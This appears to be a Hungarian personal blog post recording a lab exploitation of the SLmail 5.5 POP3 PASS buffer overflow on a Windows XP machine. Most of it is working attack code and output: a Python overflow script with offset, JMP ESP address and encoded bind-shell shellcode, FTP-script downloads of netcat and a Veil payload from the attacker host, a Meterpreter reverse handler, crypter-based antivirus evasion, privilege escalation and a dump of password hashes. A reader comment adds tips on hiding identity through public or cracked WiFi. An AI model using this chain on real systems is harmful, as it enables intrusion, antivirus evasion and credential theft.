2014. január 23., csütörtök

SLmail exploit


Step 1: download this: http://www.offensive-security.com/pwbonline/extrabos.tar.gz
Step 2: install the SLmail application on the XP machine

netstat -naob

 Protokoll  Helyi cím              Idegen cím             Állapot           PID
  TCP    0.0.0.0:25             0.0.0.0:0              FIGYEL          1944
  [slsmtp.exe]

  TCP    0.0.0.0:79             0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:106            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:110            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

...

  TCP    0.0.0.0:180            0.0.0.0:0              FIGYEL          1840
  [SLadmin.exe]
...
  TCP    127.0.0.1:8376         0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]
...
  UDP    0.0.0.0:50             *:*                                    2376
  [SLmail.exe]

  UDP    0.0.0.0:54             *:*                                    2376
  [SLmail.exe]
...

root@kali:~# unicornscan -mT 192.168.56.105
TCP open                smtp[   25]        from 192.168.56.105  ttl 128
TCP open              finger[   79]        from 192.168.56.105  ttl 128
TCP open          3com-tsmux[  106]        from 192.168.56.105  ttl 128
TCP open                pop3[  110]        from 192.168.56.105  ttl 128
TCP open               epmap[  135]        from 192.168.56.105  ttl 128
TCP open         netbios-ssn[  139]        from 192.168.56.105  ttl 128
TCP open        microsoft-ds[  445]        from 192.168.56.105  ttl 128
TCP open             unknown[ 8081]        from 192.168.56.105  ttl 128

root@kali:~# nmap -sV -A 192.168.56.105 -pT:25,79,106,110,180

25/tcp  open  smtp    SLmail smtpd 5.5.0.4433
| smtp-commands: xxxxx-30298B2AD.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN,
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp  open  finger  SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp open  pop3pw  SLMail pop3pw
110/tcp open  pop3    BVRP Software SLMAIL pop3d
180/tcp open  ris?

root@kali:~# nc 192.168.56.105 25
220 xxxxx-30298B2AD.com SMTP Server SLmail 5.5.0.4433 Ready ESMTP spoken here
HELO my
250 xxxxx-30298B2AD.com
HELP
214-This server supports the following commands.
214-HELO    MAIL    RCPT    DATA    RSET
214-SEND    SOML    SAML    HELP    NOOP
214 QUIT
QUIT
221 xxxxx-30298B2AD.com Service closing transmission channel

root@kali:~# nc 192.168.56.105 79
?
Unable to find specified user.

root@kali:~# nc 192.168.56.105 106
200 hello
help
500 protocol error
?
500 protocol error
quit
200 bye

root@kali:~# nc 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00005.988109@xxxxx-30298B2AD.com>
HELP
-ERR unknown command
?
-ERR unknown command
QUIT
+OK POP3 server xxxxx-30298B2AD.com signing off.

root@kali:~# nc 192.168.56.105 180
?
HELP
QUIT
^C

http://www.exploit-db.com/exploits/638/

root@kali:~# searchsploit slmail
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
SLMail 5.5 POP3 PASS Buffer Overflow Exploit                                /windows/remote/638.py
SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit                       /windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit                                 /windows/remote/646.c

root@kali:~# cat slmail_buf.py
# Python 2 script (print statement); speaks POP3 over a plain TCP socket.
import sys
import struct            # not used anywhere in this listing
import socket
from time import sleep   # not used anywhere in this listing

# No timeout is set on the socket, so every recv() below blocks until the
# server answers; if the service stops responding the script hangs.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Oversized PASS argument. This assignment is the only thing the later runs
# in the transcript replace (a longer string, then a cyclic pattern).
buffer = 'A'*2000
# argv[1] = target host, argv[2] = TCP port; arguments are not validated.
s.connect((sys.argv[1],int(sys.argv[2])))
data=s.recv(1024)        # server greeting banner
print data
s.send('USER user\r\n')
data=s.recv(1024)        # reply to USER
print data
s.send('PASS '+buffer+'\r\n')
data=s.recv(1024)        # reply to PASS; the later runs in the transcript block here
print data
# Only reached when every recv() returned. There is no try/finally, so the
# socket is never closed explicitly on an error or interrupt path.
s.close()

Attach OllyDbg to SLMAIL.exe
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00006.1554953@xxxxx-30298B2AD.com>

+OK user welcome here

-ERR unable to lock mailbox

buffer = 'A'*5000

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00007.1647656@xxxxx-30298B2AD.com>

+OK user welcome here

^CTraceback (most recent call last):
  File "slmail_buf.py", line 16, in <module>
    data=s.recv(1024)
KeyboardInterrupt

ESP 01BFA154 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
EIP 41414141

root@kali:~# /usr/share/metasploit-framework/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A...

buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...

root@kali:~# python slmail_buf.py 192.168.56.105 110

ESP 01BFA154 ASCII "2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh
EBP 46307A46
EIP 7A46317A

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 7A46317A
[*] Exact match at offset 4654

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 2Fz3
[*] Exact match at offset 4658

In OllyDbg, search for a JMP ESP instruction:

7C91FCD8   FFE4             JMP ESP

root@kali:~# msfpayload  windows/shell_bind_tcp RPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t python
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

buf =  ""
buf += "\xdb\xd2\xb8\xb3\xb6\xb4\xe1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x03\x47\x18\x83\xc7\xb7\x54"
buf += "\x41\x1d\x5f\x11\xaa\xde\x9f\x42\x22\x3b\xae\x50\x50"
...
buffer = '\x41' * 4654 + '\xD8\xFC\x91\x7C' + '\x90'*32 + buf

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00001.6738453@xxxxx-30298B2AD.com>

+OK user welcome here

root@kali:~# nc 192.168.56.105 4444
Microsoft Windows XP [verziószám: 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmailSystem>

Next step: bypass the AV and escalate privileges.

C:\Program Files\SLmail\System>tftp -i 192.168.56.101 GET nc.exe
tftp -i 192.168.56.101 GET nc.exe
A hozzáférés megtagadva.

AV log:

2014.01.24.    09:46:38    Blocked by Access Protection rule     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\cmd.exe    C:\WINDOWS\system32\tftp.exe    Anti-virus Standard Protection:Prevent use of tftp.exe    Action blocked : Read

C:\Program Files\SLmail\System>echo open 192.168.56.101 21> ftp.txt
echo open 192.168.56.101 21> ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET nc.exe>>ftp.txt
echo GET nc.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhasználó (192.168.56.101:(none)): open 192.168.56.101 21

bin
GET nc.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajtóban (C) lévő kötet xp_system.
 A kötet sorozatszáma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  09:48    <DIR>          .
2014.01.24.  09:48    <DIR>          ..
2014.01.24.  09:47                56 ftp.txt
2002.11.19.  11:40             3 358 listrcrd.txt
2014.01.23.  09:24             1 898 maillog.000
2014.01.24.  00:00            51 104 maillog.001
2014.01.24.  09:33             6 141 maillog.txt
               5 fájl            62 557 bájt
               2 könyvtár  30 726 782 976 bájt szabad

C:\Program Files\SLmail\System>

AV log:

2014.01.24.    9:48:12    Deleted     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\ftp.exe    C:\Program Files\SLmail\System\nc.exe    Tool-NetCat (Potentially Unwanted Program)

Generate payload16.exe with Veil.

C:\Program Files\SLmail\System>echo open 192.168.56.101 21>ftp.txt
echo open 192.168.56.101 21>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET payload16.exe>>ftp.txt
echo GET payload16.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhasználó (192.168.56.101:(none)): open 192.168.56.101 21


bin
GET payload16.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajtóban (C) lévő kötet xp_system.
 A kötet sorozatszáma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  10:27    <DIR>          .
2014.01.24.  10:27    <DIR>          ..
2014.01.24.  10:27                63 ftp.txt
2002.11.19.  11:40             3 358 listrcrd.txt
2014.01.23.  09:24             1 898 maillog.000
2014.01.24.  00:00            51 104 maillog.001
2014.01.24.  10:03             6 309 maillog.txt
2014.01.24.  10:27         3 059 256 payload16.exe
               6 fájl         3 121 988 bájt
               2 könyvtár  30 723 756 032 bájt szabad

C:\Program Files\SLmail\System>

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.101:443
[*] Starting the payload handler...

C:\Program Files\SLmail\System>payload16.exe
payload16.exe

msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:443 -> 192.168.56.105:3089) at 2014-01-24 10:56:18 +0100

sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ xxxxx-30298B2AD  192.168.56.101:443 -> 192.168.56.105:3089 (192.168.56.105)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : xxxxx-30298B2AD
OS              : Windows XP (Build 2600, Szervizcsomag 3).
Architecture    : x86
System Language : hu_HU
Meterpreter     : x86/win32
meterpreter >

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session     User                                                                                                      Path
 ---   ----  ----                  ----  -------     ----                                                                                                      ----
 0     0     [System Process]            4294967295                                                                                                           
 4     0     System                x86   0           NT AUTHORITY\SYSTEM                                                                                      
 188   2012  explorer.exe          x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\WINDOWS\Explorer.EXE
 300   1600  cmd.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\WINDOWS\system32\cmd.exe
...

 532   848   FrameworkService.exe  x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\Common Framework\FrameworkService.exe
 580   848   VsTskMgr.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
 644   2476  McTray.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\Common Framework\McTray.exe
 712   644   shstat.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\VirusScan Enterprise\SHSTAT.EXE
 744   848   mdm.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
 752   580   mfeann.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\mfeann.exe
...
                                                                           C:\WINDOWS\system32\mfevtps.exe
 976   3676  payload16.exe         x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\payload16.exe
...

 1840  848   SLadmin.exe           x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLadmin\SLadmin.exe
 1944  848   SLSmtp.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\slsmtp.exe
...

 2100  300   nc.exe                x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\nc.exe
 2136  848   mcshield.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe

meterpreter >

I encrypted nc.exe as well:

root@kali:~/Hyperion-1.0# wine crypter.exe nc.exe nc_crypt.exe

Opening nc.exe
Copied file to memory: 0x117358
Found valid MZ signature
Found pointer to PE Header: 0xd8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

...

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm nc_crypt.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

The AV was bypassed...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Admin:1022:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
ASPNET:1004:275b6f5ffbf7997723474a13bebfa08d:738da873863e137c2e75504e6a8b4ca5:::
Rendszergazda:1005:aad3b435b51404eeaad3b435b51404ee:6f3961367d2b4d1f55f14af59f34cd45:::
Segítségnyújtó:1021:b3c85a07a2fc61530574f646d69db64a:2e82f56f50cfaa7347b018126bcad628:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bf0859717440c82b18e3f5cb36db8211:::
user:1023:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Vendég:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

Game OVER.

3 megjegyzés:

  1. Szia! Nagyon szuper blog!

    Privátban szeretnék tőled egy kis segítséget kérni C# programozásban. :-)

    email:jack-spaero[@]freemail.hu

  2. Ezzel vége a TOR-nak:

    http://pcforum.hu/hirek/15785/Megszerezte+az+FBI+az+osszes+a+Tor-on+keresztul+elkuldott+levelet.html

    http://pcforum.hu/hirek/15313/Konnyuszerrel+azonosithatok+a+Tor-t+hasznalo+internetezok.html

  3. 1. Ip cím elrejtésére a TOR mellett számos más lehetőség van.

    2. nyilvános Net kávézó vagy publikus WiFi , esetleg eldobható mobile stick + TOR és ... sok sikert a beazonosítási kísérletekhez...

    3. anomym email küldésre vannak más szolgáltatások amiket direkt erre hoztak létre...

    4. TOR-t általában azért használ valaki, hogy : a FORRÁS oldalon rejtse a forgalmat. A CÉL oldalon történő rejtőzéshez vannak ettől jobb módszerek.

    Magyarul a TOR arra való, hogy az ISP-d le lássa, hogy mit csinálsz milyen oldalakat látogatsz, stb. A private VPN-ek is erre valók. Ahhoz, hogy a cél oldalon ne lehessen lenyomozni a forrást, nem a TOR a legjobb, hanem az ellenőrizhetetlen forrás-ok alkalmazása (nyilvános wifi-k használata, kocsmák wifi jelszavának megszerzése, anonym proxy-kkal való kombinálása, satöbbi...)

